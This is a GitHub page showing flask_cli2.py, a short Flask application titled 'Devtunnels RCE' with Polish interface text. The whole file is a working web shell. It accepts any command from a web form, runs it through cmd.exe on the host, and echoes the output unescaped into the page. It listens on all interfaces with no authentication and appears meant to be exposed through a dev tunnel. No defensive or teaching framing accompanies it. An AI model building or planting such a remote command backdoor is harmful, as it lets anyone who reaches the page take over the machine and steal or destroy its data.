-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathflask_cli2.py
More file actions
50 lines (40 loc) · 1.37 KB
/
flask_cli2.py
File metadata and controls
50 lines (40 loc) · 1.37 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
from flask import Flask, request, redirect, url_for
import subprocess, locale
app = Flask(__name__)
history = []
@app.route("/")
def index():
output = "\n".join(history)
return f"""
<h2>Devtunnels RCE</h2>
<form method="post" action="/run">
<input type="text" name="cmd" placeholder="ipconfig /all & route print" style="width:400px;">
<input type="submit" value="Wykonaj">
</form>
<div style="border:1px solid #ccc; padding:10px; margin-top:10px;
font-family: monospace; white-space: pre-wrap;
height:600px; overflow-y:scroll; background:#111; color:#0f0;">
{output}
</div>
"""
@app.route("/run", methods=["POST"])
def run_cmd():
cmd = request.form.get("cmd", "").strip()
if not cmd:
return redirect(url_for("index"))
try:
result = subprocess.run(
["cmd.exe", "/c", cmd],
capture_output=True
)
enc = locale.getpreferredencoding()
stdout = result.stdout.decode(enc, errors="replace")
stderr = result.stderr.decode(enc, errors="replace")
output = stdout + stderr
except Exception as e:
output = f"Exception: {e}"
# dodajemy do historii
history.append(f"C:\\> {cmd}\n{output}")
return redirect(url_for("index"))
if __name__ == "__main__":
app.run(debug=False, host="0.0.0.0", port=5000)